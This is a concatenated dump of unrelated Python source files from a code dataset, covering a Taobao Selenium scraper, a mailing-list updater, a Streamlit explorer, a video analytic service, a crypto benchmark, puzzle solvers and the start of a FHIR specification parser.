time.sleep(5)\n return error_str\n\n\ndef delete_data(cursor, etl_date, shop):\n sel_sql = \"\"\"\n delete from goods_shop where etl_date = %s and shop = %s\n \"\"\"\n cursor.execute(sel_sql, (etl_date, shop[1]))\n\n\ndef updateShop(cursor, conn, shop):\n sql = \"\"\"\n update shop set enable = 0 where name = %s\n \"\"\"\n cursor.execute(sql, shop[1])\n conn.commit()\n\n\ndef UpdateAllShop(cursor, conn):\n sql = \"\"\"\n update shop set enable = 1 \n \"\"\"\n cursor.execute(sql)\n conn.commit()\n\n\ndef read_goods_by_sql(conn, cursor):\n sel_sql = \"\"\"\n select name from tb_search where enabled =1\n \"\"\"\n cursor.execute(sel_sql)\n shop_list = cursor.fetchall()\n return shop_list\n\n\ndef enabled_goods(conn, cursor, shopName):\n update_eql = \"\"\"\n update tb_search set enabled = 0 where name = %s\n \"\"\"\n cursor.execute(update_eql, shopName)\n conn.commit()\n\n\ndef enabled_goods_one(conn, cursor):\n update_eql = \"\"\"\n update tb_search set enabled = 1 \n \"\"\"\n cursor.execute(update_eql)\n conn.commit()\n\n\ndef main():\n # 链接mysql\n conn = pymysql.connect('localhost', 'root', 'root', 'vhr')\n # 创建游标\n cursor = conn.cursor()\n search_goods = read_goods_by_sql(conn, cursor)\n # search_goods = [\"香蕉\", \"苹果\", \"梨\", \"葡萄\"]\n # print('爬取列表: ', search_goods)\n random_good = random.randint(0, len(search_goods) - 1)\n chrome = start(search_goods[random_good])\n # 15s手动扫码\n time.sleep(15)\n login(chrome)\n print('登录成功:', chrome.current_url)\n\n # 数据日期\n etl_date = time.strftime(\"%Y%m%d\", time.localtime())\n etl_time = time.strftime(\"%H:%M:%S\", time.localtime())\n print('----- 销量排行 -----')\n count = 0\n for search_good in search_goods:\n pages = 3\n if count > 40: # 后续宝贝热度低\n pages = 2\n data_by_search(conn, cursor, etl_date, etl_time, chrome, search_good, 1, pages)\n count = count + 1\n enabled_goods(conn, cursor, search_good)\n enabled_goods_one(conn, cursor)\n\n # 爬取数据--代表店铺\n # print('------------- 代表店铺 -------------------')\n # shop_list = sel_shops(cursor)\n # print(\"猎杀名单:\")\n # for s in shop_list:\n # print(s[1])\n # for shop in shop_list:\n # delete_data(cursor, etl_date,shop)\n # switch_url = shop[2]\n # ps4_url = shop[3]\n # chrome.get(switch_url)\n # time.sleep(10)\n # print('########店铺:', shop[1], ' ###### switch #########')\n # # 爬取switch商品\n # crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time)\n # \n # if ps4_url is not None:\n # chrome.get(ps4_url)\n # time.sleep(10)\n # print('########店铺:', shop[1], ' ###### ps4 #########')\n # # 爬取ps4商品\n # crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time)\n # # 该店铺爬取完 enable设置为 0 当天不用重复爬取了\n # updateShop(cursor, conn, shop)\n # print(shop[1], \"--猎杀完毕--休息下\")\n # time.sleep(random.randint(90, 150))\n # # 全部爬取完 enable设置为 1\n # UpdateAllShop(cursor, conn)\n chrome.close()\n # 关闭游标和连接\n cursor.close()\n conn.close()\n\n\nif __name__ == '__main__':\n scheduler = sched.scheduler(time.time, time.sleep)\n # 增加调度任务 初始\n scheduler.enter(1, 1, main)\n # 增加调度任务 240-360分钟\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n\n # 所有调度任务 暂定一天调度4次\n # 隐藏tk主窗口\n tkinter.Tk().withdraw()\n\n for i in scheduler.queue:\n # tkinter.messagebox.showinfo('tip', '即将开始爬取数据')\n # 运行任务\n scheduler.run()\n\n print('-' * 30)\n print('爬取结束')\n","sub_path":"workspace/pycharmproject/wayne_python/projects/taobao_selenium/half_auto_taobao.py","file_name":"half_auto_taobao.py","file_ext":"py","file_size_in_byte":18899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648740198","text":"''' Euler 3\nThe prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n'''\nimport numpy as np\n\n# works but not with low numbers such as 24, as the 'n' number is not divided. The try/except is the bottleneck here and I suspect the solution is needlessly complex. Perhaps a While loop approach would be best.\n\ndef largest_prime_factor(n, num=100):\n try:\n r = np.arange(2, num)\n f = r[n % r == 0] # this is incorrect, re-read about prime numbers\n prime_factors = (f[:i] for i in range(2, len(f)) if np.multiply.reduce(f[:i]) == n)\n array = next(prime_factors)\n return array[-1]\n \n except StopIteration:\n return largest_prime_factor(n, num*10)\n\n\nn = 600851475143\n\n# 6857\nlargest_prime_factor(n)\n","sub_path":"Euler/Euler_3.py","file_name":"Euler_3.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422312599","text":"from urllib.request import urlopen\nimport json\n\nresponse = urlopen(\"https://sheetsu.com/apis/v1.0/d50491ba55ba\")\nstr_response = response.read().decode('utf-8')\nmembers = json.loads(str_response)\n\nimport argparse\nimport subprocess\nimport time\n\nmailingLists = [\n \"pepoff\",\n \"drumline\",\n \"sectionleaders\",\n \"pepfun\",\n \"pep-band\",\n \"highwoodwinds\",\n \"middlewinds\",\n \"lowbrass\",\n \"trumpets\",\n \"colorguard\",\n \"marching\",\n \"clarinets\",\n \"flutes\",\n \"stands\",\n \"pit\",\n \"pep-seniors\",\n \"pep-juniors\",\n \"pep-sophomores\",\n \"pep-freshmen\",\n \"drummajors\",\n \"highwoodwinds-marching\",\n \"middlewinds-marching\",\n \"lowbrass-marching\",\n \"trumpets-marching\",\n \"clarinets-marching\",\n \"flutes-marching\",\n \"drumline-marching\",\n \"pit-marching\",\n \"stands\",\n \"winterguard\"]\n\nprint(\"UPDATING MAILING LISTS\")\nsubprocess.call([\"rm\", \"-f\", \"-r\", \"newMailingLists\"])\nsubprocess.call([\"mkdir\", \"newMailingLists\"])\n\npepFunOut = open('newMailingLists/pepfun', 'w')\nmarchingOut = open('newMailingLists/marching', 'w')\nstandsOut = open('newMailingLists/stands', 'w')\nsectionLeaderOut = open('newMailingLists/sectionleaders', 'w')\nofficerOut = open('newMailingLists/pepoff', 'w')\ncolorguardOut = open('newMailingLists/colorguard', 'w')\npepBandOut = open('newMailingLists/pep-band', 'w')\nclarinetsOut = open('newMailingLists/clarinets', 'w')\nhighwoodwindsOut = open('newMailingLists/highwoodwinds', 'w')\nflutesOut = open('newMailingLists/flutes', 'w')\ntrumpetsOut = open('newMailingLists/trumpets', 'w')\nmiddlewindsOut = open('newMailingLists/middlewinds', 'w')\nlowbrassOut = open('newMailingLists/lowbrass', 'w')\ndrumlineOut = open('newMailingLists/drumline', 'w')\npitOut = open('newMailingLists/pit', 'w')\npepSeniors = open('newMailingLists/pep-seniors', 'w')\npepJuniors = open('newMailingLists/pep-juniors', 'w')\npepSophomores = open('newMailingLists/pep-sophomores', 'w')\npepFreshmen = open('newMailingLists/pep-freshmen', 'w')\ndrummajorsOut = open('newMailingLists/drummajors', 'w')\nhighwoodwinds_marching = open('newMailingLists/highwoodwinds-marching', 'w')\nmiddlewinds_marching = open('newMailingLists/middlewinds-marching', 'w')\nlowbrass_marching = open('newMailingLists/lowbrass-marching', 'w')\ntrumpets_marching = open('newMailingLists/trumpets-marching', 'w')\nclarinets_marching = open('newMailingLists/clarinets-marching', 'w')\nflutes_marching = open('newMailingLists/flutes-marching', 'w')\ndrumline_marching = open('newMailingLists/drumline-marching', 'w')\npit_marching = open('newMailingLists/pit-marching', 'w')\nstands_only = open('newMailingLists/stands', 'w')\nwinterGuard = open('newMailingLists/winterguard', 'w')\n\n\ndef toEmail(name, email):\n return name + ' <' + email + '>\\n';\n\n\ndef assignStands(name, email, stands):\n if stands == \"clarinets\":\n clarinetsOut.write(toEmail(name, email));\n highwoodwindsOut.write(toEmail(name, email));\n if stands == \"flutes\":\n flutesOut.write(toEmail(name, email));\n highwoodwindsOut.write(toEmail(name, email));\n if stands == \"trumpets\":\n trumpetsOut.write(toEmail(name, email));\n if stands == \"middlewinds\":\n middlewindsOut.write(toEmail(name, email));\n if stands == \"lowbrass\":\n lowbrassOut.write(toEmail(name, email));\n if stands == \"drumline\":\n drumlineOut.write(toEmail(name, email));\n if stands == \"pit\":\n pitOut.write(toEmail(name, email));\n if stands == \"colorguard\":\n colorguardOut.write(toEmail(name, email));\n if stands == \"drummajors\":\n drummajorsOut.write(toEmail(name, email));\n\n\ndef assignMarching(name, email, marching):\n marchingOut.write(toEmail(name, email));\n if marching == \"clarinets\":\n clarinets_marching.write(toEmail(name, email));\n highwoodwinds_marching.write(toEmail(name, email));\n if marching == \"flutes\":\n flutes_marching.write(toEmail(name, email));\n highwoodwinds_marching.write(toEmail(name, email));\n if marching == \"trumpets\":\n trumpets_marching.write(toEmail(name, email));\n if marching == \"middlewinds\":\n middlewinds_marching.write(toEmail(name, email));\n if marching == \"lowbrass\":\n lowbrass_marching.write(toEmail(name, email));\n if marching == \"drumline\":\n drumline_marching.write(toEmail(name, email));\n if marching == \"pit\":\n pit_marching.write(toEmail(name, email));\n if marching == \"colorguard\":\n colorguardOut.write(toEmail(name, email));\n\nfor i in members:\n name = i['Name']\n if name == \"name\":\n continue\n email = i['Email']\n isPepFun = i['pepfun']\n marching = i['marching']\n isOnlyStands = i['stands only']\n standsSection = i['stands section']\n isSectionLeader = i['sectionleaders']\n isOfficer = i['pepoff']\n isPepBand = i['pep-band']\n isSenior = i['seniors']\n isJunior = i['juniors']\n isSophomore = i['sophomores']\n isFreshmen = i['freshmen']\n isWinterGuard = i['winterguard']\n if isPepFun == \"x\":\n pepFunOut.write(toEmail(name, email))\n if isOnlyStands == \"x\":\n stands_only.write(toEmail(name, email))\n if isSectionLeader == \"x\":\n sectionLeaderOut.write(toEmail(name, email))\n if isOfficer == \"x\":\n officerOut.write(toEmail(name, email))\n if isPepBand == \"x\":\n pepBandOut.write(toEmail(name, email))\n if marching != \"\":\n assignMarching(name, email, marching)\n assignStands(name, email, standsSection)\n if isSenior == \"x\":\n pepSeniors.write(toEmail(name, email));\n if isJunior == \"x\":\n pepJuniors.write(toEmail(name, email));\n if isSophomore == \"x\":\n pepSophomores.write(toEmail(name, email))\n if isFreshmen == \"x\":\n pepFreshmen.write(toEmail(name, email))\n if isWinterGuard == \"x\":\n winterGuard.write(toEmail(name, email))\n\npepFunOut.close()\nmarchingOut.close()\nstandsOut.close()\nsectionLeaderOut.close()\nofficerOut.close()\npepBandOut.close()\nclarinetsOut.close()\nhighwoodwindsOut.close()\nflutesOut.close()\ntrumpetsOut.close()\nmiddlewindsOut.close()\nlowbrassOut.close()\ndrumlineOut.close()\npitOut.close()\ncolorguardOut.close()\ndrummajorsOut.close();\npepSeniors.close();\npepJuniors.close();\npepSophomores.close();\npepFreshmen.close();\nhighwoodwinds_marching.close();\nmiddlewinds_marching.close();\nlowbrass_marching.close();\ntrumpets_marching.close();\nclarinets_marching.close()\nflutes_marching.close()\npit_marching.close()\ndrumline_marching.close()\nstands_only.close();\nwinterGuard.close();\n\n\nfor list in mailingLists:\n subprocess.call([\"scp\", \"newMailingLists/\"+list, \"dkaravoussianis@ccc.wpi.edu:/shared/aliases/\"+list])\n","sub_path":"updateAliases.py","file_name":"updateAliases.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95078780","text":"\"\"\"\r\n 學生模型類\r\n 管理每個學生的資訊\r\n\"\"\"\r\n\r\nclass StudentModel:\r\n def __init__(self,name=\"\",age=0,score=0,id=0):\r\n \"\"\"\r\n 學生基本資訊\r\n :param name: 姓名\r\n :param id: 學號\r\n :param age: 年齡\r\n :param score: 成績\r\n \"\"\"\r\n self.id = id\r\n self.name = name\r\n self.age = age\r\n self.score = score","sub_path":"student_manager_system/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140110846","text":"import tkinter as tk\nclass App:\n def __init__(self,master):\n frame=tk.Frame(master)\n frame.pack(side='left')\n self.h1_there=tk.Button(frame,text='打招呼',bg='black',fg='white',command=self.say_hi)\n self.h1_there.pack(padx=10,pady=5)\n def say_hi(self):\n print('大家好!')\nroot=tk.Tk()\napp=App(root)\nroot.mainloop()\n\n \n\n\n\n\n","sub_path":"tkinter1.py","file_name":"tkinter1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"515269549","text":"import streamlit as st\n# To make things easier later, we're also importing numpy and pandas for\n# working with sample data.\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\ndef app():\n client_list = pd.read_csv(\"client_list_raw.csv\", index_col=\"SK_ID_CURR\")\n\n all_features = client_list.columns.tolist()\n\n st.markdown('# Compare clients')\n\n client_list_id = st.multiselect(\n 'Select client IDs',\n client_list.index)\n 'You selected:', client_list_id\n\n st.write(client_list[client_list.index.isin(client_list_id)])\n\n st.markdown('# Focus on specific features')\n\n features_selected = st.multiselect(\n 'Filter on specific features',\n all_features, default=[\"% default\"])\n\n 'You selected:', features_selected\n\n st.write(client_list[features_selected][client_list.index.isin(client_list_id)])\n\n st.markdown('# Compare with the rest of the clients')\n\n analyze_feature = st.selectbox(\n 'Check the distribution of a feature',\n features_selected)\n st.write('You selected:', analyze_feature)\n\n # analyze feature distribution\n if analyze_feature:\n if client_list[analyze_feature].dtype == 'O':\n bar_chart_data = client_list.reset_index().groupby([analyze_feature], as_index=False) \\\n .SK_ID_CURR.count() \\\n .rename(columns={\"SK_ID_CURR\": \"Clients number\"}) \\\n .set_index(analyze_feature)\n st.bar_chart(bar_chart_data)\n\n else:\n fig, ax = plt.subplots()\n ax.hist(client_list[analyze_feature], bins=50)\n plt.title(analyze_feature)\n plt.style.use('seaborn-dark-palette')\n st.pyplot(fig)\n\n","sub_path":"explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"88490214","text":"from __future__ import print_function, division, unicode_literals, absolute_import\nimport cv2\nimport contextlib\nimport json\nimport logging\nimport numpy as np\nimport os\nimport select\nimport sys\nimport threading\nimport time\nimport traceback\n\nfrom concurrent import futures\nfrom kafka import KafkaProducer\nfrom flask import Flask, jsonify, request, Response\nfrom ace import analytic_pb2, analytic_pb2_grpc\nfrom ace.rtsp import RTSPHandler\nimport grpc\nfrom ace.aceclient import AceDB\n\nfrom google.protobuf import json_format\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass EndpointAction(object):\n\n def __init__(self, action):\n self.action = action\n\n def __call__(self, *args):\n answer = self.action()\n return answer\n\n\nclass AnalyticHandler:\n def __init__(self, frame_obj=None, input_type=\"frame\", stream_addr=\"\", session_id=\"\"):\n\n self.input_frame = analytic_pb2.InputFrame()\n self.analytic = analytic_pb2.AnalyticData()\n self.resp = analytic_pb2.ProcessedFrame()\n self.resp.data.stream_addr = stream_addr\n self.resp.session_id = session_id\n if not frame_obj:\n return\n\n self.frame = frame_obj[2]\n self.input_frame.frame_num = frame_obj[1]\n self.input_frame.timestamp = frame_obj[0]\n\n def from_request(self, req):\n self.input_frame.MergeFrom(req.frame)\n self.analytic.MergeFrom(req.analytic)\n self.jpeg = self.input_frame.frame.img\n self.frame = cv2.imdecode(np.fromstring(self.jpeg, dtype=np.uint8), 1)\n\n def get_frame(self, format=None):\n if format == \"JPEG\":\n logger.info(\"Getting image as jpeg\")\n if not self.jpeg:\n self.jpeg = cv2.imencode(\".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), 100])[\n 1].tostring()\n return self.jpeg\n return self.frame\n\n def add_bounding_box(self, classification, confidence, x1, y1, x2, y2, supplement=None):\n \"\"\"Add bounding box for classification to the response\"\"\"\n if self.frame is not None:\n x1 = max(min(x1, self.frame.shape[1]-2), 2)\n x2 = max(min(x2, self.frame.shape[1]-2), 2)\n y1 = max(min(y1, self.frame.shape[0]-2), 2)\n y2 = max(min(y2, self.frame.shape[0]-2), 2)\n box = analytic_pb2.RegionOfInterest(\n box=analytic_pb2.BoundingBox(corner1=analytic_pb2.Point(\n x=x1, y=y1), corner2=analytic_pb2.Point(x=x2, y=y2)),\n classification=classification, confidence=confidence, supplement=supplement)\n self.resp.data.roi.extend([box])\n\n def frame_number(self):\n return self.input_frame.frame_num\n\n def timestamp(self):\n return self.input_frame.timestamp\n\n def get_response(self):\n self.resp.analytic.MergeFrom(self.analytic)\n self.add_frame_info()\n return self.resp\n\n def get_analytic_metadata(self):\n return self.analytic\n\n def add_frame_info(self, include_frame=False):\n self.resp.frame.frame_num = self.input_frame.frame_num\n self.resp.frame.timestamp = self.input_frame.timestamp\n self.resp.frame.frame_byte_size = len(cv2.imencode(\".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), 100])[1].tostring())\n if include_frame:\n self.add_frame()\n\n def add_frame(self, quality=70):\n self.resp.frame.frame.height = self.frame.shape[0]\n self.resp.frame.frame.width = self.frame.shape[1]\n self.resp.frame.frame.color = self.frame.shape[2]\n self.resp.frame.frame.img = cv2.imencode(\n \".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), quality])[1].tostring()\n self.resp.frame.frame_byte_size = self.resp.frame.frame.ByteSize()\n\n def add_encoded_frame(self, enc_frame):\n self.resp.frame.frame.img = enc_frame\n self.resp.frame.frame_byte_size = self.resp.frame.frame.ByteSize()\n\n def update_analytic_metadata(self, **kwargs):\n name = kwargs.get(\"name\")\n addr = kwargs.get(\"addr\")\n gpu = kwargs.get(\"requires_gpu\")\n operations = kwargs.get(\"operations\")\n filters = kwargs.get(\"filters\")\n replica_addrs = kwargs.get(\"replica_addrs\")\n\n if name:\n self.analytic.name = name\n if gpu:\n self.analytic.requires_gpu = gpu\n if addr:\n self.analytic.addr = addr\n if operations:\n self.analytic.operations = operations\n if filters:\n self.analytic.filters = filters\n if replica_addrs:\n self.analytic.replica_addrs\n\n def add_filter(self, f, value):\n logger.info(\"Adding filter: {!s} = {!s}\".format(f, value))\n self.resp.analytic.filters[f] = str(value)\n\n def merge_response(self, resp):\n self.resp.MergeFrom(resp)\n\n def add_frame_if_missing(self, frame):\n if self.resp.frame.ByteSize() > 0:\n return False\n logger.info(\"No frame in response. Adding frame.\")\n self.add_frame(frame)\n return True\n\n def set_name(self, name):\n self.resp.analytic.name = name\n\n def add_operation(self, operation):\n self.resp.analytic.operations.append(operation)\n\n def set_start_time(self):\n self.resp.data.start_time_millis = int(round(time.time()*1000))\n\n def set_end_time(self):\n self.resp.data.end_time_millis = int(round(time.time()*1000))\n\n def add_tags(self, **kwargs):\n for key, value in kwargs.items():\n self.resp.data.tags[key] = str(value)\n\n\nclass AnalyticService:\n \"\"\" \"\"\"\n\n def __init__(self, name, port=3000, debug=False, stream_video=False, verbose=False, num_workers=1):\n self.app = Flask(name)\n self._add_endpoint(\"/config\", \"config\", self.config, methods=[\"PUT\"])\n self._add_endpoint(\"/kill\", \"kill\", self.kill, methods=[\"POST\"])\n self.analytic = analytic_pb2.AnalyticData()\n self.port = port\n self.handler = None\n self.stream_video = stream_video\n self.num_workers = num_workers\n self.verbose = verbose\n\n def Run(self):\n \"\"\" \"\"\"\n logger.info(\"REST config service running on ::{!s}\".format(self.port))\n self.app.run(host=\"::\", port=self.port)\n\n def config(self):\n \"\"\" \"\"\"\n if self.handler:\n logger.info(\"Shutting down RTSP connection.\")\n self.handler.terminate()\n\n data = request.get_data(as_text=False)\n req = analytic_pb2.StreamRequest().FromString(data)\n logger.debug(\"Request: \", req)\n self.analytic.MergeFrom(req.analytic)\n if self.verbose:\n print(\"Creating RTSP handler with verbose option\")\n print(\"Config Request :\", req)\n self.handler = RTSPHandler(req.stream_source,\n self._call_endpoint,\n cap_width=req.frame_width,\n cap_height=req.frame_height,\n analytic_data=req.analytic,\n verbose=self.verbose,\n num_workers=self.num_workers) # TODO Untested.\n self.system_tags = dict(req.system_tags)\n self.stream_addr = req.stream_source\n if req.kafka_addr:\n self.handler.add_producer(producer=KafkaProducer(\n bootstrap_servers=req.kafka_addr, value_serializer=lambda value: value.SerializeToString()))\n if req.db_addr:\n host, port = req.db_addr.split(\":\")\n self.handler.add_database(db_client=AceDB(host=host, port=port))\n t = threading.Thread(target=self.handler.run)\n t.start()\n return {\"code\": 200}\n\n def kill(self):\n \"\"\" \"\"\"\n if not self.handler:\n logger.info(\"Nothing running\")\n return\n logger.info(\"Shutting down RTSP connection\")\n self.handler.terminate()\n return {\"code\": 200}\n\n def RegisterProcessVideoFrame(self, f):\n \"\"\" \"\"\"\n self.register_func(f, input_type=\"frame\")\n\n def RegisterProcessFrameBatch(self, f):\n \"\"\" \"\"\"\n raise NotImplementedError\n\n def register_name(self, name):\n \"\"\" \"\"\"\n self.analytic.name = name\n\n def register_func(self, f, input_type=\"frame\"):\n \"\"\" \"\"\"\n self.func = f\n self.func_type = input_type\n\n def _add_endpoint(self, endpoint=None, endpoint_name=None, handler=None, methods=None):\n self.app.add_url_rule(endpoint, endpoint_name,\n EndpointAction(handler), methods=methods)\n\n def _call_endpoint(self, frame_obj):\n handler = AnalyticHandler(\n frame_obj, input_type=self.func_type, stream_addr=self.stream_addr)\n handler.update_analytic_metadata(\n name=self.analytic.name, addr=self.analytic.addr)\n handler.set_start_time()\n self.func(handler)\n handler.set_end_time()\n for key, value in self.system_tags.items():\n handler.resp.data.tags.update({key: value})\n\n return handler.get_response()\n","sub_path":"lang/python/ace/analyticservice.py","file_name":"analyticservice.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21754647","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2019 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\nimport random\nimport time\nfrom hashlib import sha256\n\nfrom btclib.curve import mult\nfrom btclib.curves import secp256k1\nfrom btclib.ssa import sign, verify, batch_verify\n\nrandom.seed(42)\n\nec = secp256k1\nhf = sha256\nhsize = hf().digest_size\nhlen = hsize * 8\n\n# n = 1 loops forever and does not really test batch verify\nn_sig = [2, 4, 8, 16, 32, 64, 128]\nm = []\nsig = []\nQ = []\nfor j in range(max(n_sig)):\n m.append(random.getrandbits(hlen).to_bytes(hsize, 'big'))\n q = random.getrandbits(ec.nlen) % ec.n\n sig.append(sign(ec, hf, m[j], q))\n Q.append(mult(ec, q, ec.G))\n\nfor n in n_sig:\n\n # no batch\n start = time.time()\n for j in range(n):\n assert verify(ec, hf, m[j], Q[j], sig[j])\n elapsed1 = time.time() - start\n\n # batch\n start = time.time()\n assert batch_verify(ec, hf, m[:n], Q[:n], sig[:n])\n elapsed2 = time.time() - start\n\n print(n, elapsed2 / elapsed1)\n","sub_path":"py-scripts/speedup_batchval.py","file_name":"speedup_batchval.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"321345279","text":"from flask import Flask\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n return \"Hello, World!\"\n\n@app.route(\"/status\")\ndef status():\n current_time = datetime.strftime(datetime.now(), '%Y/%m/%d %H:%m')\n return {\n 'status': True,\n 'name': 'SkillMessenger',\n 'time': current_time}\n\napp.run()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319699727","text":"PREAMBLE_LENGTH = 25\n\n\nclass MaskingInput:\n\n def __init__(self, data):\n self.data = data\n\n\n def get_first_invalid(self):\n for i in range(PREAMBLE_LENGTH, len(self.data)):\n if not self.is_valid_index(i):\n return self.data[i]\n return None\n\n def is_valid_index(self, i):\n preamble = self.data[i-PREAMBLE_LENGTH:i]\n datum = self.data[i]\n return self.can_sum(preamble, datum)\n\n def get_sum_set(self, goal):\n for i in range(len(self.data)):\n for j in range(i+2, len(self.data)):\n subset = self.data[i:j]\n total = sum(subset)\n if total == goal:\n return subset\n elif total > goal:\n break\n return None\n\n\n @staticmethod\n def can_sum(preamble, datum):\n for value in preamble:\n needed = datum - value\n if needed in preamble:\n return True\n return False\n\n\ndef main():\n masking = MaskingInput(process())\n\n invalid_number = masking.get_first_invalid()\n # Part 1: 104054607\n print('Part 1: {}'.format(invalid_number))\n\n sum_set = masking.get_sum_set(invalid_number)\n magic_number = min(sum_set) + max(sum_set)\n # Part 2: 13935797\n print('Part 2: {}'.format(magic_number))\n\n\ndef process():\n data = []\n f = open('data.txt', 'r')\n\n for line in f:\n line = line.strip()\n data.append(int(line))\n\n f.close()\n return data\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2020/09/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351095677","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport io\nimport os\nimport re\nimport json\nimport datetime\nfrom pathlib import Path\nimport stringcase # type: ignore\nfrom typing import Any, Dict, List, Optional, Union, TYPE_CHECKING\n\nfrom .logger import logger\nfrom . import fhirclass\n\nif TYPE_CHECKING:\n from .generators.yaml_model import GeneratorConfig\n\n# TODO: check\n# allow to skip some profiles by matching against their url (used while WiP)\nskip_because_unsupported = [\n r\"SimpleQuantity\",\n]\n\n\nclass FHIRSpec(object):\n \"\"\" The FHIR specification.\n \"\"\"\n\n def __init__(self, directory: Path, generator_config: \"GeneratorConfig\"):\n assert directory.is_dir()\n self.directory = directory\n self.generator_config = generator_config\n self.info = FHIRVersionInfo(self, directory)\n\n # system-url: FHIRValueSet()\n self.valuesets: Dict[str, \"FHIRValueSet\"] = {}\n\n # system-url: FHIRCodeSystem()\n self.codesystems: Dict[str, \"FHIRCodeSystem\"] = {}\n\n # profile-name: FHIRStructureDefinition()\n self.profiles: Dict[str, \"FHIRStructureDefinition\"] = {}\n\n # Load profiles\n self.prepare()\n self.read_profiles()\n self.finalize()\n\n def prepare(self):\n \"\"\" Run actions before starting to parse profiles.\n \"\"\"\n self.read_valuesets()\n self.handle_manual_profiles()\n\n def read_bundle_resources(self, filename: str):\n \"\"\" Return an array of the Bundle's entry's \"resource\" elements.\n \"\"\"\n logger.info(\"Reading {}\".format(filename))\n filepath = os.path.join(self.directory, filename)\n with io.open(filepath, encoding=\"utf-8\") as handle:\n parsed = json.load(handle)\n if \"resourceType\" not in parsed:\n raise Exception(\n 'Expecting \"resourceType\" to be present, but is not in {}'.format(\n filepath\n )\n )\n if \"Bundle\" != parsed[\"resourceType\"]:\n raise Exception('Can only process \"Bundle\" resources')\n if \"entry\" not in parsed:\n raise Exception(\n \"There are no entries in the Bundle at {}\".format(filepath)\n )\n\n return [e[\"resource\"] for e in parsed[\"entry\"]]\n\n # MARK: Managing ValueSets and CodeSystems\n\n def read_valuesets(self):\n resources = self.read_bundle_resources(\"valuesets.json\")\n for resource in resources:\n if \"ValueSet\" == resource[\"resourceType\"]:\n assert \"url\" in resource\n valueset = FHIRValueSet(self, resource)\n self.valuesets[valueset.url] = valueset\n if valueset.dstu2_inlined_codesystem:\n codesystem = FHIRCodeSystem(self, valueset.dstu2_inlined_codesystem)\n codesystem.valueset_url = valueset.url\n self.found_codesystem(codesystem)\n elif \"CodeSystem\" == resource[\"resourceType\"]:\n assert \"url\" in resource\n if \"content\" in resource and \"concept\" in resource:\n codesystem = FHIRCodeSystem(self, resource)\n self.found_codesystem(codesystem)\n else:\n logger.warning(f\"CodeSystem with no concepts: {resource['url']}\")\n logger.info(\n f\"Found {len(self.valuesets)} ValueSets and {len(self.codesystems)} CodeSystems\"\n )\n\n def found_codesystem(self, codesystem):\n if codesystem.url not in self.generator_config.mapping_rules.enum_ignore:\n self.codesystems[codesystem.url] = codesystem\n\n def valueset_with_uri(self, uri) -> Optional[\"FHIRValueSet\"]:\n assert uri\n if uri not in self.valuesets:\n logger.warning(f\"Valueset not found for URI : {uri}\")\n return None\n return self.valuesets[uri]\n\n def codesystem_with_uri(self, uri) -> Optional[\"FHIRCodeSystem\"]:\n assert uri\n if uri not in self.codesystems:\n logger.warning(f\"Codesystem not found for URI : {uri}\")\n return None\n return self.codesystems[uri]\n\n # MARK: Handling Profiles\n\n def read_profiles(self):\n \"\"\" Find all (JSON) profiles and instantiate into FHIRStructureDefinition.\n \"\"\"\n resources = []\n for filename in [\n \"profiles-types.json\",\n \"profiles-resources.json\",\n ]: # , 'profiles-others.json']:\n bundle_res = self.read_bundle_resources(filename)\n for resource in bundle_res:\n if \"StructureDefinition\" == resource[\"resourceType\"]:\n resources.append(resource)\n else:\n logger.debug(\n \"Not handling resource of type {}\".format(\n resource[\"resourceType\"]\n )\n )\n\n # create profile instances\n for resource in resources:\n profile = FHIRStructureDefinition(self, resource)\n for pattern in skip_because_unsupported:\n if re.search(pattern, profile.url) is not None:\n logger.info('Skipping \"{}\"'.format(resource[\"url\"]))\n profile = None\n break\n\n if profile is not None and self.found_profile(profile):\n profile.process_profile()\n\n def found_profile(self, profile):\n if not profile or not profile.name:\n raise Exception(\"No name for profile {}\".format(profile))\n if profile.name.lower() in self.profiles:\n logger.debug('Already have profile \"{}\", discarding'.format(profile.name))\n return False\n\n self.profiles[profile.name.lower()] = profile\n return True\n\n 